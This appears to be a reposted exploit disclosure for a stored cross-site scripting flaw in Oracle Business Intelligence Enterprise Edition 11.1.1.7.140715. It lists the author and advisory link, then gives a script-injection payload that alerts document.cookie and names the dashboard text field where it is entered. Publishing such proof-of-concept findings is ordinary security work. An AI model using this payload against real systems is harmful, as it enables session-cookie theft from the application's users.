Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 – Stored XSS Exploit

Oracle Business Intelligence Enterprise Edition version 11.1.1.7.140715 is vulnerable to a stored cross site scripting exploit.

# Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
# Exploit Author: omurugur
# Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html
# Version: 11.1.1.7.140715
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr

Stored  XSS:

“;!—“”<script>alert(document.cookie);</script>=&{(alert(document.cokie))}

Vulnerable area = Dashboard - Add New Text
Please follow and like us:

Leave a Reply

Your email address will not be published.